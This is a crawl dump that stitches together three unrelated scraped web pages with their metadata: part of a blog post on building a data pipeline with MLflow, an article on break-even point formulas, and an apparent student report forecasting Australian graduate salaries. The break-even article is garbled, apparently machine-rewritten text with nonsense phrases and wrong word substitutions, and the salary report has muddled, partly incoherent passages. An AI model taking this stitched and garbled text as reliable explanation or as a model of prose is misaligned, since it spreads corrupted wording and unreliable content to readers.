anomaly detection.\n\nNext you need to create a conda environment and activate it:\n\n$conda env create -n pipeline --file conda.yaml$ conda activate pipeline\n\n\nNow MLflow is available in the environment. Start the MLflow UI on the port 5009.\n\n(pipeline) $mlflow ui --port 5009 & There is no specific reason for 5009. But if you want to change the port number then you have to change \"config.ini\" accordingly. Then we create three experiments. Here an experiment is a set of runs. When you start a run, you can specify an experiment which the run should belong to. (pipeline)$ MLFLOW_TRACKING_URI=http://localhost:5009 mlflow experiments create load\nCreated experiment 'load' with id 1\n\n(pipeline) $MLFLOW_TRACKING_URI=http://localhost:5009 mlflow experiments create processing Created experiment 'processing' with id 2 (pipeline)$ MLFLOW_TRACKING_URI=http://localhost:5009 mlflow experiments create model\nCreated experiment 'model' with id 3\n\n\nThe id numbers are important, because we use them when starting a run.\n\n(pipeline) $mlflow run --no-conda -e load --experiment-id 1 . -P table=transactions This command execute load/load_data.py which splits the whole data into a training set and a test set. The result (the training set and the test set) of this run is logged as \"artifacts\" in experiment \"load\". After the execution you can check the result from the Web UI. The following command starts a run for data processing. It converts the training set and the test set in a certain way and stores the function for the data processing as an artifact. Change the retrieval_time before executing it. (pipeline)$ mlflow run --no-conda -e processing --experiment-id 2 . -P table=transactions -P retrieval_time=2019-02-09\n\n\nThe last step is a hyperparameter tuning with GridSearchCV. The model is the (penalised) logistic regression. Do not forget to change processed_time.\n\n(pipeline) $mlflow run --no-conda -e model --experiment-id 3 . -P logic=plain -P processed_time=2019-02-09 This process takes very long (around 1 hour) so, if you want to avoid such a heavy training for PoC add the following line to line 152. df = df.head(10000) The trained model is saved as a \"model\" and you can start easily the web API of the model. From the web UI you need to check the path to the model, then execute the following command with the path to the model (pipeline)$ mlflow pyfunc serve -p 1234 --no-conda -m /xxxxxxx/artifacts/model\n\n\nThen http://127.0.0.1:1234/invocations will be the endpoint of the API.\n\nFinally the coherent pass of steps is checked by main.py.\n\n(pipeline) $mlflow run --no-conda -e main . -P retrieval_time=2019-02-09 -P table=transactions -P logic=plain -P algorithm=LogisticRegression This command starts the given run for data loading (table, retrieval_time) and then look for a newest coherent path within the given types (logic, algorithm). If there is no coherent path, then a run is started. The coherent path can be found in experiment \"Default\".", null, "In this case the run for training with (LogisticRegression, 1549793781) is the last step and stores the trained model you need. ### Implementation is not so easy Large part of the source codes is for MLflow while the analysis itself is easy. You can find the corresponding analysis in this notebook. If you would like just to log the result of the training, then it is easy to use MLflow (Tracking). But If you want to integrate MLflow into the project process which we discussed above, then you need to write several helper functions and a small class. This is because MLflow does not provide functions to search a run. I needed to write functions for that purpose. ### FAQ for my implementation #### Why don't we use run id? Do you want to deal with a string like \"20128fa478b4458e945260a124b72c4f\"? If yes, use it. But if you do so, then you can not make use of \"type\" of a run. That is, \"searching the newest data processing by a certain logic\" becomes nonsense. #### Why do we use unix time? For the main entry point we give processed_time and trained_time as metrics. MLflow requires that a metric is a number, therefore we can not use an ordinary time description. If you want to use a more user-friendly description, there are (at least) two solutions. 1. Use \"yyyymmddHHMMSS\" format (in UTC), then you can use the description as a parameter (str) and a metric (int) at the same time. 2. Stick with parameters. (Do not give a time description in \"metric\"). #### Why don't we use start time? The reason is the same as above. #### But we use a date when starting a run. If a date is given, then we look for the newest run within the given date. #### Why do we do \"train-test-splitting\" in data loading. You don't need to do it in data loading. PoC is just an example. #### What if there are two data sources? Imagine there two tables you need. Then the easiest solution would be to fetch the two tables in one run and store them as artifacts. Another solution would be to implement logic so that we can specify two runs for data loading. (E.g. table=transactions,customers.) #### Why don't we extend the \"multistep_workflow\" example? You can find the example \"multistep_workflow\" in the MLflow repository. There are two points I don't like. • The whole steps belong to one experiment. This makes it difficult to compare runs in the same steps. • A dependency chain is not clear. #### Why don't we make use of conda at the run time? If several data scientists work for a project, then the development environment should be unified. That is, there should be conda.yaml which is managed by the project team. Then why don't we use it? ### Further Development The implementation in the GitHub is just a minimal PoC. And actually I have not implemented several things. I write them. #### Modularisation of a type. The type should be specified by a parameter. That is, if we execute the following command $ mlflow run -e model . -P algorithm=rf [...]\n\n\nthen a code for random forest model should be executed,\n\n\\$ mlflow run -e model . -P algorithm=xgboost [...]\n\n\nthen a code for XGBoost model should be executed. Namely the script for the entry point of training is unique and the algorithm should be chosen by a parameter. We need to write something like the following:\n\nif algorithm == \"rf\":\nresult = rf(data, parameters)\nelif algorithm == \"xgboost\":\nresult = xgboost(data, parameters)\n\n\nThe functions such as rf or xgboost are defined in a separate script.\n\nI wrote several functions and codes for searching a specified run. The interface should be more unified and we should be able to use without knowing the details of the classes of MLflow.\n\nOf course.\n\n## Problems\n\nI find MLflow very cool, but it is still a beta release. There are several things to do before the official release.\n\n### Documentation\n\nI have not understood relations among the classes of MLflow yet. For example lots of classes related to a run belong to mlflow.entities. Here is a question: How can we get all key-value pairs of parameters of a run with a given run id?\n\n1. Get the experiment id with a MLflow client instance.\n2. Get the list of RunInfo instances with client.list_run_infos(experiment_id).\n3. Each RunInfo instance has data property with the value in RunData.\n4. RunData instance has an attribute param which is a list of Param instances.\n5. Each Param instance has key and value properties. All pairs of the properties are what we want.\n\nWell, it is very difficult to find/understand these relations from the documentation.\n\n(To be honest I don't like Java-style-OOP like this. For example an Experiment instance has no information about runs which belong to the experiment. Experiment class is used only to keep very small piece of information.)\n\nI strongly recommend to write docstring in detail.\n\nclass Run(_MLflowObject):\n\"\"\"\nRun object.\n\"\"\"\n\n\nThis docstring is not helpful at all.\n\n### Deletion of the directory of a run\n\nIf a run is removed, then the related files should also be removed. It is very difficult to remove directories of the removed runs manually because the directory name of a run is run id.\n\n### Experiment name instead of id\n\nAn experiment name should be available when executing a mlflow run command.\n\n### Don't ignore set_experiment method\n\nIf we start a run by \"mlflow run\" command, then the setter\n\nmlflow.set_experiment(\"your_special_experiment\")\n\n\nis ignored. I don't think that it is a good behaviour.\n\n## Summary\n\n• MLflow is a useful application/framework to manage a data science project.\n• For a simple usage MLflow works out of the box.\n• If you need a non-simple usage, then you have to implement several functions/classes.\nCategories: #data-mining" ]
[ null, "https://stdiff.net/img/mb/20190205-mlflow.png", null, "https://stdiff.net/img/mb/20190205-steps.png", null, "https://stdiff.net/img/mb/20190205-git.png", null, "https://stdiff.net/img/mb/20190205-parameters.png", null, "https://stdiff.net/img/mb/20190205-processing.png", null, "https://stdiff.net/img/mb/20190205-src-tgt.png", null, "https://stdiff.net/img/mb/20190205-main.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8838477,"math_prob":0.7982031,"size":21575,"snap":"2022-05-2022-21","text_gpt3_token_len":4920,"char_repetition_ratio":0.12799592,"word_repetition_ratio":0.017624728,"special_character_ratio":0.22243337,"punctuation_ratio":0.11176889,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9627211,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14],"im_url_duplicate_count":[null,2,null,2,null,2,null,2,null,2,null,2,null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-17T08:36:06Z\",\"WARC-Record-ID\":\"<urn:uuid:ca40ab60-6b1e-49be-a411-e4e8641c665e>\",\"Content-Length\":\"32973\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:18cdb3a1-378a-4743-b1df-a7b42de167d8>\",\"WARC-Concurrent-To\":\"<urn:uuid:4d0d9648-3078-4bc9-9a02-dbcf7289fad2>\",\"WARC-IP-Address\":\"217.160.0.150\",\"WARC-Target-URI\":\"https://stdiff.net/MB2019021201.html\",\"WARC-Payload-Digest\":\"sha1:GR5UGAESPGWHK4776TCAZLOEALT74YF2\",\"WARC-Block-Digest\":\"sha1:MMVO6MI5SLUV23KFMHD4ZY27U26RIYXN\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662517018.29_warc_CC-MAIN-20220517063528-20220517093528-00560.warc.gz\"}"}
https://inter-base.net/which-of-the-following-is-not-a-correct-definition-of-the-break-even-point/
[ "Do you want your service to do a profit? Duh, of food you do! yet when you’re starting out, it may take a few years before you go into profit territory. And also after you begin making a profit, you may be in ~ the break-even suggest for a while. So, what is the break-even point?\n\nWhat is a break-even point?\n\nWhen your firm reaches a break-even point, your complete sales same your total expenses. This method that you’re bringing in the same amount the money you should cover all of your expenses and also run her business. When you break-even, your service does not profit. But, it also does not have a loss.\n\nYou are watching: Which of the following is not a correct definition of the break-even point?\n\nTypically, the an initial time you with a break-even point way a positive turn for your business. As soon as you break-even, you’re lastly making enough to cover your operation costs.\n\nFinding her break-even point can aid you determine if you have to do one or both of the following:\n\nIf her business’s revenue is listed below the break-even point, you have a loss. Yet if her revenue is above the point, you have a profit.\n\nUse her break-even point to determine just how much you should sell come cover prices or make a profit. And, monitor your break-even suggest to help set budgets, manage costs, and also decide a pricing strategy.\n\nBreak-even allude formula\n\nTo learn just how to discover break-even point, girlfriend must recognize the break-even point formula. To know how to calculate break-even point, you require the following:\n\nVariable costsSelling price of the product\n\nSo, what’s the difference in between fixed vs. Change costs? Fixed prices are expenses that stay the same, nevertheless of how plenty of sales girlfriend make. These room the expenses you salary to run your business, such together rent and insurance.\n\nOn the various other hand, change costs adjust based on your sales activity. When you sell more items, your variable prices increase. Examples of variable prices include straight materials and also direct labor.\n\nYour offering price is just how much you fee for the one unit or product.\n\nWithout further ado, this is the break-even formula:\n\nBreak-even suggest Per Unit = Fixed costs / (Sales Price every Unit – Variable costs Per Unit)\n\nThe sales price every unit minus variable expense per unit is additionally called the donation margin. Your contribution margin reflects you how much take-home profit you do from a sale.\n\nThe break-even point is your complete fixed prices divided by the difference in between the unit price and variable expenses per unit. Save in mind that fixed expenses are the in its entirety costs, and the sales price and also variable expenses are simply per unit.", null, "To calculate your break-even allude for sales dollars, use the following formula:\n\nBreak-even allude for Sales Dollars = Fixed expenses / <(Sales – change Costs) / Sales>\n\nYou have the right to use the over formulas to perform a break-even analysis. A break-even evaluation can help you see where you have to make adjustments v your pricing or expenses.", null, "Break-even allude examples\n\nIf you a visual learner, this one’s because that you. To additional understand the break-even allude calculation, check out a few examples below.\n\nBreak-even suggest in units\n\nCheck out some instances of calculating your break-even suggest in units.\n\nExample 1\n\nBreak-even suggest in devices is the number of goods you need to sell to reach your break-even point. As a reminder, use the following formula to uncover your break-even allude in units:\n\nFixed prices / (Sales Price per Unit – Variable expenses Per Unit)\n\nSay you very own a toy store and want to find your break-even suggest in units. Your solved costs complete is \\$6,000, your variable prices per unit is \\$25, and your sales price every unit is \\$50. Plug your totals into the break-even formula to discover out her break-even suggest in units.\n\n\\$6,000 / (\\$50 – \\$25) = 240 units\n\nYou should sell 240 units to break even.\n\nExample 2\n\nLet’s take a look at exactly how cutting prices can impact your break-even point. Say your variable expenses decrease come \\$10 per unit, and also your resolved costs and sales price every unit continue to be the same.\n\n\\$6,000 / (\\$50 – \\$10)\\$6,000 / \\$40 = 150 units\n\nWhen girlfriend decrease your variable prices per unit, it takes fewer units to break even. In this case, you would must sell 150 systems (instead that 240 units) to rest even.\n\nBreak-even point in sales dollars\n\nThe break-even suggest in dollars is the lot of income you need to lug in to reach her break-even point. Recognize the break-even suggest in sales by recognize your contribution margin ratio.\n\nAgain, this is the break-even suggest for sales dollars formula:\n\nFixed expenses / <(Sales – variable Costs) / Sales>\n\nThe following component of the over formula is for your contribution margin ratio: <(Sales – change Costs) / Sales>\n\nTo simplify things, let’s usage the same quantities from the critical example:\n\nFixed costs: \\$6,000Variable costs per unit: \\$25Sales price per unit: \\$50\n\nFirst, discover your donation margin. Again, this is her sales price every unit minus her variable expenses per unit.\n\nContribution Margin = \\$50 – 25Contribution Margin = \\$25\n\nContribution Margin proportion = \\$25 / \\$50Contribution Margin ratio = 50% (or 0.50)" ]
[ null, "https://inter-base.net/which-of-the-following-is-not-a-correct-definition-of-the-break-even-point/imager_1_7397_700.jpg", null, "https://inter-base.net/which-of-the-following-is-not-a-correct-definition-of-the-break-even-point/imager_2_7397_700.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9059364,"math_prob":0.8130745,"size":6088,"snap":"2022-05-2022-21","text_gpt3_token_len":1305,"char_repetition_ratio":0.18408942,"word_repetition_ratio":0.009775171,"special_character_ratio":0.22552562,"punctuation_ratio":0.101608805,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95583874,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-27T02:33:52Z\",\"WARC-Record-ID\":\"<urn:uuid:16a75f6b-c625-4417-a2d7-76b77a02de32>\",\"Content-Length\":\"16034\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c6b7b539-d5a8-4d18-b4b8-68514fe25fa3>\",\"WARC-Concurrent-To\":\"<urn:uuid:7b60b398-8da7-4c17-8e87-0f9bad46bf72>\",\"WARC-IP-Address\":\"104.21.41.154\",\"WARC-Target-URI\":\"https://inter-base.net/which-of-the-following-is-not-a-correct-definition-of-the-break-even-point/\",\"WARC-Payload-Digest\":\"sha1:3DH2GJLBJ3NV2KCGZQJOXR6QS37FHYSB\",\"WARC-Block-Digest\":\"sha1:HRAPQIDWDOYPTLPALHSP7DO2LWZ7YPSX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320305052.56_warc_CC-MAIN-20220127012750-20220127042750-00048.warc.gz\"}"}
https://tocsy.pik-potsdam.de/CRPtoolbox/?q=fnc_ace
[ "# CRP Toolbox\n\n## ace\n\nFinds optimal transformation and maximal correlation.\n\n### Syntax\n\n``````mcor=ace(x,y,[w,ii,oi])\n[theta, phi]=ace(x,y,[,w,ii,oi])\n[theta, phi, mcor]=ace(x,y,[,w,ii,oi])\n[theta, phi, mcor, i, o, imax, omax]=ace(x,y,[,w,ii,oi])\n``````\n\n### Description\n\nEstimates the optimal transformations of the system theta(x)=phi(x) and computes the resulting maximal correlation mcor, where x is a one-column vector and y can be a multi-column vector.\n\n[theta, phi, mcor, i, o, imax, omax]=ace(x,y [,w,ii,oi]) estimates the optimal transformations theta, phi and the maximal correlation mcor and outputs the number of inner iterations i, break-up number of inner inner iterations, number of outer iterations o and break-up number of outer inner iterations. If the algorithm doesn't converge, the number of iterations will be negative signed.\n\nWithout output arguments, ace plots the optimal transformations theta and phi.\n\n### Parameters\n\nw is the half-length of the boxcar window, ii is the maximal number of inner iterations, oi is the minimal number of outer iterations.\n\n### Examples\n\n``````x=(-1:.002:1)+.3*rand(1,1001);\ny=(-1:.002:1).^2+.3*rand(1,1001);\ncorrcoef(x,y)\nace(y,x)\n``````" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5307624,"math_prob":0.999241,"size":1433,"snap":"2022-27-2022-33","text_gpt3_token_len":395,"char_repetition_ratio":0.15675297,"word_repetition_ratio":0.021052632,"special_character_ratio":0.27424982,"punctuation_ratio":0.27246377,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9995988,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-08-16T01:25:00Z\",\"WARC-Record-ID\":\"<urn:uuid:169318c2-ebff-4d8d-b661-438152ec3a45>\",\"Content-Length\":\"9737\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2b7979d4-1ce1-42a5-a56d-bd5468cc019a>\",\"WARC-Concurrent-To\":\"<urn:uuid:5a8f4dba-deab-4f8c-91ca-b4d93dd681e0>\",\"WARC-IP-Address\":\"193.174.19.232\",\"WARC-Target-URI\":\"https://tocsy.pik-potsdam.de/CRPtoolbox/?q=fnc_ace\",\"WARC-Payload-Digest\":\"sha1:62I77TUQOF6HCRISK46JWGXLNORDKNVI\",\"WARC-Block-Digest\":\"sha1:WODR3ZZXSE7DYHZS4I55LALJB5TG4W2S\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-33/CC-MAIN-2022-33_segments_1659882572215.27_warc_CC-MAIN-20220815235954-20220816025954-00298.warc.gz\"}"}
https://github.com/scala/bug/issues/11592
[ "# BigDecimal and IterableOnce.sum #11592\n\nClosed\nopened this issue Jun 26, 2019 · 2 comments\n\nProjects\nNone yet\nMember\n\n### dwijnand commented Jun 26, 2019\n\n There is second problem with `sum`: ``````Welcome to Scala 2.13.0 (OpenJDK 64-Bit Server VM, Java 1.8.0_212). Type in expressions for evaluation. Or try :help. scala> :paste // Entering paste mode (ctrl-D to finish) import java.math.MathContext object BigDecimalTest { def main(args: Array[String]): Unit = { test() } def test(): Unit = { val bds = List( scala.math.BigDecimal(\"1000000000000000000000000.1\", MathContext.UNLIMITED), scala.math.BigDecimal(\"9.0000000000000000000000009\", MathContext.UNLIMITED)) assert(bds.sum == scala.math.BigDecimal(\"1000000000000000000000009.1000000000000000000000009\", MathContext.UNLIMITED)) // Below line works with scala 2.13.0 //assert(bds.foldLeft(BigDecimal(0, MathContext.UNLIMITED))(_ + _) == scala.math.BigDecimal(\"1000000000000000000000009.1000000000000000000000009\", MathContext.UNLIMITED)) println(\"BigDecimal works\") } } // Exiting paste mode, now interpreting. import java.math.MathContext defined object BigDecimalTest scala> BigDecimalTest.test java.lang.AssertionError: assertion failed at scala.Predef\\$.assert(Predef.scala:267) at BigDecimalTest\\$.test(:14) ... 28 elided `````` Which is probably caused by wrong math context with `num.zero` in here: https://github.com/scala/scala/blob/6b4d32c3f518d21a798e8d3cf4a8c35866afa8e2/src/library/scala/collection/IterableOnce.scala#L915 I can't stress enough that this change with 2.13 is highly surprising, even though orinal implementation with 2.11 and 2.12 has been broken. P.S. Above code works with 2.12.8 Originally posted by @35VLG84 in #11590 (comment)\n\nClosed\n\n### 35VLG84 commented Jun 26, 2019 • edited\n\n As @Ichoran pointed out in #11590 (comment) this applies also for `product`, which is broken on 2.11.12, 2.12.8 and 2.13.0: ``````Welcome to Scala 2.13.0 (OpenJDK 64-Bit Server VM, Java 1.8.0_212). Type in expressions for evaluation. Or try :help. scala> :paste // Entering paste mode (ctrl-D to finish) import java.math.MathContext val bds = List( scala.math.BigDecimal(\"1000000000000000000000000.1\", MathContext.UNLIMITED), scala.math.BigDecimal(\"9.00000000000000000000000091\", MathContext.UNLIMITED)) val prod = bds.foldLeft(BigDecimal(1, MathContext.UNLIMITED))(_ * _) assert(prod.toString == \"9000000000000000000000001.810000000000000000000000091\") // Exiting paste mode, now interpreting. import java.math.MathContext bds: List[scala.math.BigDecimal] = List(1000000000000000000000000.1, 9.00000000000000000000000091) prod: scala.math.BigDecimal = 9000000000000000000000001.810000000000000000000000091 scala> bds.product res1: scala.math.BigDecimal = 9000000000000000000000001.810000000 scala> assert(prod == bds.product) java.lang.AssertionError: assertion failed at scala.Predef\\$.assert(Predef.scala:267) ... 28 elided ``````\n\n### Ichoran commented Jun 26, 2019\n\n For reference, my suggested fix is to use `reduceOption` rather than `foldLeft` to implement these. (If someone doesn't like the overhead, then something like ``````val i = xs.iterator if (!i.hasNext) num.one else { var x = i.next while (i.hasNext) x = num.times(x, i.next) x } `````` for IterableOnce, with maybe an override for efficiency in List and IndexedSeq.)\n\nMerged\n\n### pullbot pushed a commit to Pandinosaurus/scala that referenced this issue Jul 15, 2019\n\n``` Fixes scala/bug#11592 (scala#8221) ```\n`Fixes scala/bug#11592`\n``` ae0ca7d ```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8759988,"math_prob":0.9497745,"size":1621,"snap":"2019-26-2019-30","text_gpt3_token_len":511,"char_repetition_ratio":0.12306741,"word_repetition_ratio":0.0,"special_character_ratio":0.29056138,"punctuation_ratio":0.13333334,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9719376,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-07-19T23:20:37Z\",\"WARC-Record-ID\":\"<urn:uuid:c193d47a-7e01-4c17-b29e-bb2eb6c9ea7f>\",\"Content-Length\":\"107147\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:013d8378-874e-4461-84f5-c1fc1ab315c4>\",\"WARC-Concurrent-To\":\"<urn:uuid:bcb6f3f1-78f3-42a1-8e91-7b41a546a212>\",\"WARC-IP-Address\":\"140.82.113.4\",\"WARC-Target-URI\":\"https://github.com/scala/bug/issues/11592\",\"WARC-Payload-Digest\":\"sha1:HSMDVENPC5PICWOSVKXUALH7GKHEBKRV\",\"WARC-Block-Digest\":\"sha1:EKJGXITDPZEZJCZGUHEXQWAA2ZLTAQOX\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-30/CC-MAIN-2019-30_segments_1563195526386.37_warc_CC-MAIN-20190719223744-20190720005744-00134.warc.gz\"}"}
http://www.buildrtoys.com/info/1011/1315.htm
[ " 万博体育max手机登陆app-手机版下载\n\n# 首师代数论坛系列报告(二十五)\n\nFormal matrix ring over a ring is a generalization of matrix ring over a ring, it was introduced by Tang and Zhou in 2013 and studied in recent years. In this talk, we mainly introduce the concept and properties of formal matrix rings over a ring. The idempotents of formal matrix rings over a ring, the system of formal linear equations over a commutative ring, the zero-divisors and zero-divisor graphs of a formal matrix ring over a commutative ring are studied. Linear recurring sequences over a formal matrix ring and tensor product of formal matrices and their applications will be discussed." ]
[ null ]
{"ft_lang_label":"__label__zh","ft_lang_prob":0.716187,"math_prob":0.94488907,"size":1452,"snap":"2022-40-2023-06","text_gpt3_token_len":928,"char_repetition_ratio":0.14571823,"word_repetition_ratio":0.029850746,"special_character_ratio":0.19283746,"punctuation_ratio":0.07111111,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.975937,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-31T22:42:00Z\",\"WARC-Record-ID\":\"<urn:uuid:db123180-bfb2-4285-a3e6-63b617064b9a>\",\"Content-Length\":\"18610\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a14b8fc1-3e1e-4cff-ad42-94e5c6a407b3>\",\"WARC-Concurrent-To\":\"<urn:uuid:e952fc5e-b1ed-4395-a060-ff9ce7dbd57c>\",\"WARC-IP-Address\":\"50.2.18.97\",\"WARC-Target-URI\":\"http://www.buildrtoys.com/info/1011/1315.htm\",\"WARC-Payload-Digest\":\"sha1:BHD66DVENFCMW4P7EEB46GZDZ36TCCOC\",\"WARC-Block-Digest\":\"sha1:IN4XRNO4M3ZD3MVDF45FRL3XYXOUXYIZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764499891.42_warc_CC-MAIN-20230131222253-20230201012253-00051.warc.gz\"}"}
https://www.ca5.co/convert/electric/kva-to-va
[ "# How to convert kVA to VA\n\nHow to convert apparent power from kilovolt-amps (kVA) to volt-amps (VA).\n\n### kVA to VA calculation formula\n\nThe apparent power S in volt-amps (VA) is equal to 1000 times the apparent power S in kilovolt-amps (kVA):\n\nS(VA) =  1000 × S(kVA)\n\nSo volt-amps are equal to 1000 times kilovolt-amps:\n\nVA = 1000 × kilovolt-amps\n\nor\n\nVA = 1000 × kVA\n\n#### Example\n\nWhat is the apparent power in volt-amps when the apparent power in kilovolt-amps is 3 kVA?\n\nSolution:\n\nS = 1000 × 3kVA = 3000VA\n\nHow to convert VA to kVA ►" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.67295665,"math_prob":0.9997799,"size":425,"snap":"2020-34-2020-40","text_gpt3_token_len":149,"char_repetition_ratio":0.22327791,"word_repetition_ratio":0.0,"special_character_ratio":0.33411765,"punctuation_ratio":0.05882353,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9980025,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-26T23:50:15Z\",\"WARC-Record-ID\":\"<urn:uuid:3ed9ac71-8577-4911-a27b-e5d255fd3b19>\",\"Content-Length\":\"9372\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:13485d33-2005-4212-919d-5a01ab31e3d8>\",\"WARC-Concurrent-To\":\"<urn:uuid:c06ddc5c-6749-433e-85ca-531a232d00e3>\",\"WARC-IP-Address\":\"157.245.130.6\",\"WARC-Target-URI\":\"https://www.ca5.co/convert/electric/kva-to-va\",\"WARC-Payload-Digest\":\"sha1:EYLGA2BNRY5RSYLJDJYMU66BTEVAO2EH\",\"WARC-Block-Digest\":\"sha1:NJQDRJHOGC7MEONUB7LPGQ7MP7FAMKAD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400249545.55_warc_CC-MAIN-20200926231818-20200927021818-00469.warc.gz\"}"}
https://www.ozassignments.com/solution/bit110-business-mathematics-and-statistics-paper-editing-service
[ "# BIT110 Business Mathematics and Statistics Paper Editing Service", null, "## Introduction\n\nBusiness mathematics and statistics contains the details about the salary of bachelor degree graduates in Australia. This reporteddeal with the 23 different bachelor courses. Into this reports all the analysis of the salary of the different courses. The data deals with the year from 1999 to 2015. After analysis, all the details of the different courses over the 16 years, forecast the salary of the years from 2016 to 2025. There are two different analysis perform, one is linear regression and other is the moving average business analysis. There is some variation in the values from both the analysis. Into the report, there will be using the moving average, for calculating the average salary of the year 2016 to 2025. In the calculation for the year 2016,it will take the average of the years from 2015 to 2012. Same calculation for the year 2017 to 2019, the average values of the salary changes. For the year 2017, it will be from 2016 to 2013. For the year2018, it will be 2017 to 2014 and for the year 2019, it will be 2018 to 2015. After that for the year of 2020, it will be taking anaverage of five years from 2015 to 2019. Same process for the other years from 2021 to 2024. In the end for the year 2025, it will take an average of 10 years from 2015 to 2024.\n\n### Purpose of the report\n\nThis assignment provides the details of the salary of the various bachelor courses. This report mainly deals with the forecasting values of salary for the years 2016 to 2025. For calculating the values of there are two different analysis will be performed. Other than this, thereport provides the information about the how the calculation is preforms and the working of the two different methods. Into report, different graphsrelated to the different salaries of the bachelor’sdegreesgraduate over the spam of the year 2016 to 2025 based on the years 1999 to 2015. All the data for the calculation and finding the values of the salary are taken from the graduatecareers website (Careers, n.d.).\n\n### Findings\n\nInto the report, there are finding over the salaries of the different years. With the use of the previous years. Analysis of the findings. Forecasting of the salaryis to complete with the use of two different approaches one is by the use of moving average analysis and other is based on the linear regression analysis. The below graph shows the values of the salary of 2016 with the use of moving average analysis.\n\nCalculation part with the use of moving average analysis.For the calculation of the year 2016, taken the values of the year 2012 to 2015, four-year spam.In addition, the same calculation for the year 2017 to 2019. Moreover, for the calculation of the year 2020, will be calculation is done by taking the values from 2015 to 2019, five years.In addition, same calculation into the years 2021 to 2024. Moreover, for the calculation of the year 2025, taking the values for the year 2015 to 2024, 10 years (Nelson, 2017).", null, "After that, one analysis will be done with the use of the forecasted values of the year 2016, 2017 and 2025. Calculation part is complete with the use of moving average analysis (Excel, n.d.).", null, "After that, one analysis is done on the calculation of2024 to 2025. Because in this part of the calculation, there is average year taken off 10 years.", null, "These all are the part of the calculation done with the use of the moving average analysis. Below shows that the analysis based on the linear regression.\n\nThe first analysis is done over the year of 2015 and 2016.  In the calculation, there is taking the values form the regression analysis. The values of the depended variable and r will be foundbased on the salary in 2015. The values of the independent variable are21.63819435 and value of r will be 0.984835931. With the use of the calculation, there are different calculation performed to calculate the salary of the years 2016 with the use of salary of 2015. Below shows the graphs of the changes, that comes into the values of the salary.", null, "After that other calculation is done with the use of the all the forecasted values of the years 2016, 2017 and 2025. With the use of linear regression (Zaiontz, 2017).\n\n### Conclusion\n\nBusiness mathematics and statistics, there are different analysis, performed and calculation for the analysis is also cover into this report. This reportstarts with the summary of the report and end with the calculation part of the analysis.Calculation and analysis part of the reports starts with the use of themethod, business strategy, moving average analysis.Calculate the forecasted values of the years 2016 to 2025. With the use of different approaches. For the years, 2016 to 2019 there is anaverageof the last four years. After that for the year of 2020. For this year taken the average of last five years. Last for the year of 2025 taken the average of thelast 10 years. For the calculation there are different graphs are attachedto the report. After that next part starts with the calculation with the use of linear regression. Into this whole calculation is based on the depended values,in-depended values and r. r is thecoefficient of regression.All the values calculated into the report and, with the use of the values forecasted salary of the years from 2016 to 2025 are also calculated into the report." ]
[ null, "https://seofiles.s3.amazonaws.com/seo/media/cache/3c/ba/3cbac60b1e183f04f11e39573cfb6bf0.jpg", null, "https://seofiles.s3.amazonaws.com/seo/media/uploads/2018/12/29/1.PNG", null, "https://seofiles.s3.amazonaws.com/seo/media/uploads/2018/12/29/2.PNG", null, "https://seofiles.s3.amazonaws.com/seo/media/uploads/2018/12/29/3.PNG", null, "https://seofiles.s3.amazonaws.com/seo/media/uploads/2018/12/29/4.PNG", null ]
